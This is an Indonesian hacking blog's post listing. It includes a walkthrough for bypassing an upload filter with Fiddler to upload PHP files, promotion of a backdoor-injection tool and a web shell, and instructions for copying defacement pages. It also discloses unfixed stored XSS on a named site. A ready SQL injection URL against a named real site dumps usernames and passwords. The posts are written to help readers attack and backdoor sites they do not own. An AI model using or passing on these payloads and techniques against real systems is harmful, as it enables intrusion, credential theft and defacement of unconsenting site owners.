Cara Bypass Upload Form dengan Fiddler

Cara Bypass Upload Form dengan Fiddler

  Saturday, November 23, 2019    ./MyHeartIsyr

---

Judul: Cara Bypass Upload Form dengan Fiddler

Beberapa hari yang lalu gua lagi nyari alternatif burp suite, dan kebetulan nemu
yang namanya Fiddler, dan Fiddler juga punya fitur Intercept Requests sama kayak di BurpSuite.
Dan gua juga kepikiran di BurpSuite kita bisa melakukan modify requests untuk bypass upload form
di website, jadi gua buat artikel ini (meskipun gua pake Fiddler, di Fiddler juga kita bisa melakukan
modify requests).

Ok, kita mulai.

Pertama buka Fiddler nya (Disini gua pake Fiddler untuk Web Debugger), dan Pilih
menu Tools > Options...

Setelah itu, pilih tab Connections dan masukkan port mana yang ingin dijadikan proxy oleh Fiddler
(mirip di BurpSuite)

Tutup dan buka kembali Fiddler untuk mengaktifkan fitur proxy nya.
Kedua, buka browser (disini gua pake Firefox) dan pilih menu Option > General > Network Proxy dan klik tombol
Settings...

Masukkan setinggan port yang tadi di Fiddler (kalo gua pake port 8081, tapi terserah dari kalian juga)

 
Klik Ok.

Ketiga, kita akan bypass upload form yang memanfaatkan MIME Filtering sebagai proteksinya.
Buka website yang akan dijadikan target (disini gua pake localhost) dan upload file php terlebih dahulu.

Akan muncul tulisan "JPG Only" yang artinya file php kita tidak terupload tetapi request sebelumnya terekam oleh
Fiddler.

Salin HTTP Request diatas dan buka tab Composer dan tempel di tab Raw

 

Edit beberapa bagian berikut dan klik tombol Execute

 Dan file php kita sudah terupload.

 

Catatan: Biar hasil request yang tertangkap sebelumnya tidak terpotong (truncated), klik tab Inspector,
di bagian bawahnya klik kanan dan nonaktifkan "Auto Truncate".

Sekian artikel sederhana ini, semoga bermanfaat dan jika kalian ada pertanyaan atau yang lainnya bisa tulis
di kolom komentar, Salam ^_^

Read More

X-Inf3ct0r by ./MyHeartIsyr

X-Inf3ct0r by ./MyHeartIsyr

  Saturday, October 26, 2019    ./MyHeartIsyr

---

Udah lama gak nulis lagi gara gara sibuk dan hal yang lainnya :)

Ok kali ini gua bakal rilis tool buat kalian yang pengen nanem backdoor tapi gak mau repot, sesuai judul artikel ini gua kasih nama "X-Inf3ct0r".

Sebenernya tool ini udah lama gua buat, tapi karena ada kenrala dan toolnya malah gak work, jadinya gua tunda dulu. Tapi gua sangat berterima kasih sama 74nc0x dari Sora Cyber Team karena berkat tools nya, gua bisa lanjutin lagi proyek ini.

Meskipun gua sedikit "nyontek" logikanya, X-Inf3ct0r sama sekali gak recode dari Backdoor Injector punya nya 74nc0x, tapi X-Inf3ct0r sama sekali bukan hasil recode dari tools nya 74nc0x, ini murni hasil buatan gua sendiri.

Untuk screen shot bisa dilihat di bawah:

Kalo mau donwload bisa ke: https://github.com/peternakshell/php-x-inf3ct0r

Sekian artikel sederhana ini, semoga bermanfaat, dan kalo ada yang ingin ditanyakan silakan komen dibawah ya :)

Oh iya, kalo kalian juga tertarik sama tolls buatan 74nc0x, kalian bisa juga ke repo nya: https://github.com/soracyberteam

Read More

Download Admin Finder

Download Admin Finder

  Sunday, September 29, 2019    ./MyHeartIsyr

---

Udah lama banget gak ngeblog (karena sibuk jadi anak SMA :v) akhirnya saya bisa kembali nulis disini :)

Kali ini saya ada project kecil kecilan, yaitu Admin Finder hasil modifikasi dari punya nya anggota N45HT.

Jadi disini saya nambah beberapa fitur, yaitu:

- Random User Agent
- Hasil scan disimpen di file txt
- dll

Screenshot dan link download bisa lihat postingan fanspage saya di: https://www.facebook.com/296367904641792/posts/376396139972301/?app=fbl


Sekian artikel sederhana ini, semoga toolnya bermanfaat :)

Read More

A$AP MiniShell

A$AP MiniShell

  Friday, July 05, 2019    ./MyHeartIsyr

---

Kebetulan lagi bosen dan nemu Mini Shell yang udah lama, yaudah di permak dikit :)
Ini shell sebenernya hasil remake dari mini shell yang lama (Galau Priv8 [mini] Shell), daripada nganggur mending di remake jadinya :)

Ini hasilnya (Btw ngodingnya di Andro)

Berikut kodenya ya :*

Sekian mini shell ini, semoga bermanfaat ^_^

Read More

Cara Mengambil Script Deface Dari Zone-H.org

Cara Mengambil Script Deface Dari Zone-H.org

  Tuesday, June 04, 2019    ./MyHeartIsyr

---

Beberapa hari ini saya lagi sibuk jadi baru sempet nulis lagi :)

Ok kali ini saya akan menulis tentang Cara Mengambil Script Deface Dari Zone-H.org, bagi kalian yang males atau gak tau caranya bikin script deface bisa mengambilnya disana. Gimana caranya?

1. Buka zone-h.org, lalu pilih menu Archive
2. Silakan cari Nickname yang ingin kalian cari
3. Disini saya mencari nickname: Mr.DreamX196

4. Silakan pilih mirror site yang berada disitu

5. Tekan F12 dan pilih icon tanda panah

6. Klik kanan pada code: <html class="-moz-"> dan pilih menu Copy > Inner HTML

7. Buka notepad dan paste scriptnya disitu
8. Dan simpan :)

Untuk mas/mbak Mr.DreamX196: Maaf ya udah nyolong script tanpa ijin :)

Sekian tulisan ini, semoga bermanfaat ^_^

Read More

Stored XSS in http://www.damafurn.co.id

Stored XSS in http://www.damafurn.co.id

  Saturday, May 11, 2019    ./MyHeartIsyr

---

./MyHeartIsyr is back!!

Status: Unfixed

Read More

SQL Injection in http://pps.iiq.ac.id/

SQL Injection in http://pps.iiq.ac.id/

  Thursday, May 09, 2019    ./MyHeartIsyr

---

Iseng dorking XSS malah nemu bug SQL Injection :D

POC: http://pps.iiq.ac.id/pustaka/search.php?prefix=Q%27+union+select+1,2,group_concat(username,0x3a,password,0x3a),4,5+from+_xuser--+-

Read More